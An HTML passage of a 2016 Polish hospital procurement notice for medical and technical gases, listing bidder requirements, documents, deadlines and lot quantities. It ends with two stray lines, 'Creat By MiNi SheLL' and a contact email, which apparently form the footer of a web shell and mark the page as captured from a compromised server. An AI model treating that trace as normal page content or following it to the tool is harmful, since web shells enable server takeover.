<ul class="kh_indent_1"><li><p>Wykonawca ubiegający się o udzielenie zamówienia zobowiązany jest wykazać się wykonaniem lub wykonywaniem w okresie ostatnich trzech lat, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie co najmniej jednym zamówieniem, którego przedmiotem była dostawa gazów medycznych i/lub technicznych o wartości nie mniejszej niż 251.000,00 zł - w przypadku składania oferty na oba pakiety, a w przypadku składania oferty na poszczególne pakiety - o wartości nie mniejszej niż: 250.000,00 zł dla pakietu 1, 1.000,00 zł dla pakietu 2. Ocena spełniania warunku dokonana zostanie zgodnie z formułą spełnia - nie spełnia, na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu określonych w art. 22 ust. 1 ustawy Prawo zamówień publicznych oraz w oparciu o informacje zawarte w dokumentach załączonych do oferty.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje szczegółowo warunku. Ocena spełniania warunku dokonana zostanie zgodnie z formułą spełnia - nie spełnia, na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu określonych w art. 22 ust. 1 ustawy Prawo zamówień publicznych.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje szczegółowo warunku. Ocena spełniania warunku dokonana zostanie zgodnie z formułą spełnia - nie spełnia, na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu określonych w art. 22 ust. 1 ustawy Prawo zamówień publicznych.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje szczegółowo warunku. Ocena spełniania warunku dokonana zostanie zgodnie z formułą spełnia - nie spełnia, na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu określonych w art. 22 ust. 1 ustawy Prawo zamówień publicznych.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1. Aktualnie obowiązujące  dokumenty dopuszczające do obrotu produkty lecznicze (dot. pakietu 1).
2. Oświadczenie Wykonawcy, iż oferowany dwutlenek węgla do laparoskopii, został dopuszczony do obrotu na terenie RP na mocy obowiązujących przepisów, tj. posiada wpisy i świadectwa wydane przez uprawnione organy, zgodnie z ustawą z dnia 20 maja 2010 r. o wyrobach medycznych (Dz. U. Nr 107 poz. 679 ze zm) - dot. pakietu 1 (załącznik nr 6 do SIWZ):
deklarację zgodności CE producenta (dotyczy wszystkich klas wyrobu medycznego),
certyfikat jednostki notyfikującej (dotyczy klasy wyrobu medycznego: I sterylna, I z funkcją pomiarową, IIa, IIb, III),
zgłoszenie/powiadomienie/wniosek do Prezesa Urzędu Rejestracji Produktów Leczniczych, Wyrobów Medycznych i Produktów Biobójczych. 
Wraz z oświadczeniem Wykonawcy, że dostarczy te dokumenty na każde wezwanie Zamawiającego w terminie wyznaczonym przez Zamawiającego.
3. Oświadczenie Wykonawcy, iż oferowane rozprężalnie - tlenu butlowego medycznego i podtlenku azotu medycznego, zostały dopuszczone do obrotu na terenie RP na mocy obowiązujących przepisów, tj. posiadają wpisy i świadectwa wydane przez uprawnione organy, zgodnie z ustawą z dnia 20 maja 2010 r. o wyrobach medycznych (Dz. U. Nr 107 poz. 679 ze zm) - dot. pakietu 1 (załącznik nr 8 do SIWZ):
deklarację zgodności CE producenta (dotyczy wszystkich klas wyrobu medycznego),
certyfikat jednostki notyfikującej (dotyczy klasy wyrobu medycznego: I sterylna, I z funkcją pomiarową, IIa, IIb, III),
zgłoszenie/powiadomienie/wniosek do Prezesa Urzędu Rejestracji Produktów Leczniczych, Wyrobów Medycznych i Produktów Biobójczych. 
Wraz z oświadczeniem Wykonawcy, że dostarczy te dokumenty na każde wezwanie Zamawiającego w terminie wyznaczonym przez Zamawiającego.
4. Oświadczenie Wykonawcy, że wszystkie oferowane rozprężalnie spełniają wymagania normy PN-EN ISO 7396-1 - dot. pakietu 1 (załącznik nr 8 do SIWZ).
5. Oświadczenie Wykonawcy, że będzie posiadał dokumenty Urzędu Dozoru Technicznego potwierdzające możliwość użytkowania stacji zgazowania, po dokonaniu uruchomienia stacji - dot. pakietu 1 (załącznik nr 8 do SIWZ).
6. Oświadczenie, iż Wykonawca posiada system on-line umożliwiający podgląd dokumentów sprzedaży i dostaw (dot. pakietu 1, 2) - załącznik nr 7 do SIWZ.
7. Oświadczenie Wykonawcy dot. roku produkcji zbiornika kriogenicznego (dot. pakietu 1) - załącznik nr 8 do SIWZ.
8. Oświadczenie Wykonawcy dot. roku wykonania generalnego remontu zbiornika kriogenicznego (o ile dotyczy) - dot. pakietu 1 (załącznik nr 8 do SIWZ):
9. Oświadczenie Wykonawcy dot. pojemności wodnej zbiornika kriogenicznego (dot. pakietu 1) - załącznik nr 8 do SIWZ.
10. Oświadczenie Wykonawcy dot. daty produkcji tablic redukcyjnych dla każdej rozprężalni (dot. pakietu 1) - załącznik nr 8 do SIWZ.</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>2. Zezwolenie na obrót produktami leczniczymi, zgodnie z ustawą Prawo farmaceutyczne z dnia 6 września 2001r. (Dz. U. z 2008 r. Nr 45, poz. 271 z póź. zm.), dotyczy hurtowni farmaceutycznej, wytwórcy, składu konsygnacyjnego (odpowiednio) - dotyczy pakietu 1:
Zezwolenie Głównego Inspektora Farmaceutycznego lub koncesja na podjęcie działalności gospodarczej 
w zakresie prowadzenia hurtowni farmaceutycznej lub,
Zezwolenie Głównego Inspektora Farmaceutycznego na wytwarzanie produktów leczniczych, jeżeli Wykonawca jest wytwórcą lub,
w przypadku Wykonawcy prowadzącego skład konsygnacyjny - Zezwolenie na prowadzenie składu zawierające uprawnienia przyznane przez Głównego Inspektora Farmaceutycznego w zakresie obrotu produktami leczniczymi lub
oświadczenie, że dla podjęcia działalności gospodarczej objętej zamówieniem nie jest wymagana koncesja lub zezwolenie.
Jeżeli Wykonawca, wykazując spełnianie warunków, o których mowa w art. 22 ust. 1 ustawy, polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2 b ustawy, a podmioty te będą brały udział w realizacji części zamówienia, Zamawiający żąda przedstawienia w odniesieniu do tych podmiotów oświadczenia o braku podstaw do wykluczenia na podstawie art. 24 ust. 1 ustawy. 
Wykonawcy wspólnie ubiegający się o udzielenie zamówienia zobowiązani są ustanowić pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Każdy z Wykonawców wspólnie ubiegających się o udzielenia zamówienia zobowiązany jest do złożenia wszystkich wskazanych w pkt. VI.B SIWZ oświadczeń oraz dokumentów. Jeżeli oferta Wykonawców wspólnie ubiegających się o udzielenie zamówienia zostanie wybrana, Zamawiający będzie mógł żądać przed zawarciem umowy w sprawie zamówienia publicznego umowy regulującej współpracę tych Wykonawców. Powyższe dotyczy również Wykonawców będących osobami fizycznymi (tj. przedsiębiorców podlegających wpisowi do ewidencji działalności gospodarczej), także tych, którzy prowadzą wspólnie działalność gospodarczą lub są wspólnikami spółki cywilnej.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zeromski-szpital.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Szpital Specjalistyczny im. Stefana Żeromskiego SP ZOZ w Krakowie, os. Na Skarpie 66, 31-913 Kraków,pawilon C, pokój nr 2.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.03.2016 godzina 11:00, miejsce: Kancelaria Szpitala Specjalistycznego im. Stefana Żeromskiego SP ZOZ w Krakowie, os. Na Skarpie 66, 31-913 Kraków, pawilon C, pokój nr 2.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pakiet 1 - Dostawa tlenu ciekłego wraz z dzierżawą zbiornika ciekłego tlenu z systemem telemetrii i dzierżawą rezerwowej 24 stanowiskowej rozprężalni butlowej tlenu med. oraz dostawa gazów medycznych wraz z dzierżawą butli oraz dzierżawą rozprężalni  podtlenku azotu med. i sprężonego powietrza.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia	j.m.	ilość
tlen medyczny ciekły	tona	760
dzierżawa zbiornika ciekłego tlenu	miesiąc	36
dzierżawa rampy tlenowej zapasowej	miesiąc	36
dwutlenek węgla do laparoskopii butle 10l/7,5kg i 40l/26kg	kg	1640
podtlenek azotu butle 10l/7kg i 40l/28kg	kg	3104
tlen medyczny butle 2l/200 bar	szt	1360
tlen medyczny butle 5l/150 bar	szt	1560
tlen medyczny butle 10l/150 bar	szt	180
tlen medyczny butle 40l/150 bar	szt	195
Dzierżawa butli med.	butlodni	256000
Dzierżawa rampy podtlenku azotu med.	miesiąc	36
Dzierżawa rampy sprężonego powietrza	miesiąc	36.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 24.10.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.05.2019.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Czas usunięcia awarii ramp - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pakiet 2 - Dostawa gazów specjalnych wraz z dzierżawą butli.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia	j.m.	ilość
Argon butle 5L	szt	12
Dzierżawa butli	butlodni	3240.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 24.10.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.04.2019.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin dostawy gazów - 5</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com